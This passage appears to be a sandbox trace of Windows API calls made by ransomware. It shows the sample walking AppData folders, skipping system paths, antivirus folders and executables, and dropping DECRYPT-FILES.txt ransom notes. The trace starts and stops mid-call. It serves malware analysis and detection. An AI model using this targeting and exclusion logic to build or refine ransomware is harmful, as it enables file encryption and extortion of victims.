ftLastWriteTime.dwLowDateTime=0xef632f84, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Themes\\", cAlternateFileName="")) returned 0 [0080.518] FindClose (in: hFindFile=0x5f8cd8 | out: hFindFile=0x5f8cd8) returned 1 [0080.518] CloseHandle (hObject=0x448) returned 1 [0080.518] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f71aa70, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x27c7d150, ftLastAccessTime.dwHighDateTime=0x1d3aaba, ftLastWriteTime.dwLowDateTime=0x27c7d150, ftLastWriteTime.dwHighDateTime=0x1d3aaba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Word", cAlternateFileName="")) returned 1 [0080.518] lstrcmpW (lpString1="Word", lpString2=".") returned 1 [0080.518] lstrcmpW (lpString1="Word", lpString2="..") returned 1 [0080.518] lstrcatW (in: lpString1="Word", lpString2="\\" | out: lpString1="Word\\") returned="Word\\" [0080.518] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="Word\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\" [0080.518] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\", lpSrch="\\Program Files") returned 0x0 [0080.518] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\", lpSrch=":\\Windows") returned 0x0 [0080.518] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\", lpSrch="\\Games\\") returned 0x0 [0080.518] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\", lpSrch="\\Tor Browser\\") returned 0x0 [0080.518] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\", lpSrch="\\ProgramData\\") returned 0x0 [0080.518] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0080.518] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0080.519] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0080.519] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\", lpSrch="\\All Users") returned 0x0 [0080.519] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\", lpSrch="\\IETldCache\\") returned 0x0 [0080.519] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\", lpSrch="\\Local Settings\\") returned 0x0 [0080.519] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\", lpSrch="\\AppData\\Local") returned 0x0 [0080.519] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\", lpSrch="AhnLab") returned 0x0 [0080.519] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0080.519] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\") returned 61 [0080.519] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.519] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\\\jkbimi8.tmp") returned 73 [0080.519] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\word\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x448 [0080.533] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\") returned 61 [0080.533] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0080.533] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\\\DECRYPT-FILES.txt") returned 79 [0080.533] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\word\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0080.533] WriteFile (in: hFile=0x44c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e1b8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e1b8*=0x23fc, lpOverlapped=0x0) returned 1 [0080.534] CloseHandle (hObject=0x44c) returned 1 [0080.535] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\") returned 61 [0080.535] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\*" [0080.535] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\*", lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f71aa70, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xac324420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac324420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8cd8 [0080.535] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.535] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f71aa70, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xac324420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac324420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0080.535] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.535] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.535] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac324420, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac324420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac324420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0080.535] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0080.535] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac324420, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac324420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac324420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0080.535] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0080.535] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0080.535] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0080.535] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0080.535] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0080.535] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0080.535] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0080.535] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0080.536] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0080.536] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0080.536] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.536] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0080.536] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0080.536] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0080.536] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0080.536] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\") returned 61 [0080.536] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.536] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\" [0080.536] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\jkbimi8.tmp" [0080.536] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.536] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\word\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0080.536] CloseHandle (hObject=0x0) returned 0 [0080.536] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.536] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27c7d150, ftCreationTime.dwHighDateTime=0x1d3aaba, ftLastAccessTime.dwLowDateTime=0x27c7d150, ftLastAccessTime.dwHighDateTime=0x1d3aaba, ftLastWriteTime.dwLowDateTime=0x27c7d150, ftLastWriteTime.dwHighDateTime=0x1d3aaba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="STARTUP", cAlternateFileName="")) returned 1 [0080.537] lstrcmpW (lpString1="STARTUP", lpString2=".") returned 1 [0080.537] lstrcmpW (lpString1="STARTUP", lpString2="..") returned 1 [0080.537] lstrcatW (in: lpString1="STARTUP", lpString2="\\" | out: lpString1="STARTUP\\") returned="STARTUP\\" [0080.537] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\", lpString2="STARTUP\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\" [0080.537] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\", lpSrch="\\Program Files") returned 0x0 [0080.537] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\", lpSrch=":\\Windows") returned 0x0 [0080.537] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\", lpSrch="\\Games\\") returned 0x0 [0080.537] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\", lpSrch="\\Tor Browser\\") returned 0x0 [0080.537] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\", lpSrch="\\ProgramData\\") returned 0x0 [0080.537] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0080.537] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0080.537] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0080.537] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\", lpSrch="\\All Users") returned 0x0 [0080.537] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\", lpSrch="\\IETldCache\\") returned 0x0 [0080.537] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\", lpSrch="\\Local Settings\\") returned 0x0 [0080.537] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\", lpSrch="\\AppData\\Local") returned 0x0 [0080.537] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\", lpSrch="AhnLab") returned 0x0 [0080.537] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0080.537] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\") returned 69 [0080.537] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.537] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\\\jkbimi8.tmp") returned 81 [0080.537] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\word\\startup\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x450 [0080.538] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\") returned 69 [0080.538] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0080.538] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\\\DECRYPT-FILES.txt") returned 87 [0080.538] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\word\\startup\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0080.538] WriteFile (in: hFile=0x454, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2df3c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2df3c*=0x23fc, lpOverlapped=0x0) returned 1 [0080.539] CloseHandle (hObject=0x454) returned 1 [0080.540] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\") returned 69 [0080.540] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\*" [0080.540] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\*", lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27c7d150, ftCreationTime.dwHighDateTime=0x1d3aaba, ftLastAccessTime.dwLowDateTime=0xac324420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac324420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d18 [0080.540] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.540] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27c7d150, ftCreationTime.dwHighDateTime=0x1d3aaba, ftLastAccessTime.dwLowDateTime=0xac324420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac324420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0080.540] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.540] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.540] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac324420, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac324420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac34a580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0080.540] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0080.540] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac324420, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac324420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac324420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0080.540] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0080.540] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0080.540] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0080.540] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0080.540] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0080.540] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0080.540] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0080.540] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0080.540] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0080.540] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0080.541] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.541] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0080.541] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0080.541] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0080.541] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0080.541] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\") returned 69 [0080.541] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.541] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\" [0080.541] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\jkbimi8.tmp" [0080.541] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.541] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\word\\startup\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0080.541] CloseHandle (hObject=0x0) returned 0 [0080.541] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.541] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac324420, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac324420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac324420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0080.541] FindClose (in: hFindFile=0x5f8d18 | out: hFindFile=0x5f8d18) returned 1 [0080.542] CloseHandle (hObject=0x450) returned 1 [0080.542] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27c7d150, ftCreationTime.dwHighDateTime=0x1d3aaba, ftLastAccessTime.dwLowDateTime=0x27c7d150, ftLastAccessTime.dwHighDateTime=0x1d3aaba, ftLastWriteTime.dwLowDateTime=0x27c7d150, ftLastWriteTime.dwHighDateTime=0x1d3aaba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="STARTUP\\", cAlternateFileName="")) returned 0 [0080.542] FindClose (in: hFindFile=0x5f8cd8 | out: hFindFile=0x5f8cd8) returned 1 [0080.542] CloseHandle (hObject=0x448) returned 1 [0080.542] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f71aa70, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x27c7d150, ftLastAccessTime.dwHighDateTime=0x1d3aaba, ftLastWriteTime.dwLowDateTime=0x27c7d150, ftLastWriteTime.dwHighDateTime=0x1d3aaba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Word\\", cAlternateFileName="")) returned 0 [0080.542] FindClose (in: hFindFile=0x5f8c98 | out: hFindFile=0x5f8c98) returned 1 [0080.542] CloseHandle (hObject=0x440) returned 1 [0080.543] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb458e750, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb458e750, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mozilla", cAlternateFileName="")) returned 1 [0080.543] lstrcmpW (lpString1="Mozilla", lpString2=".") returned 1 [0080.543] lstrcmpW (lpString1="Mozilla", lpString2="..") returned 1 [0080.543] lstrcatW (in: lpString1="Mozilla", lpString2="\\" | out: lpString1="Mozilla\\") returned="Mozilla\\" [0080.543] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="Mozilla\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\") returned="C:\\Users\\5p5NrGJn0jS 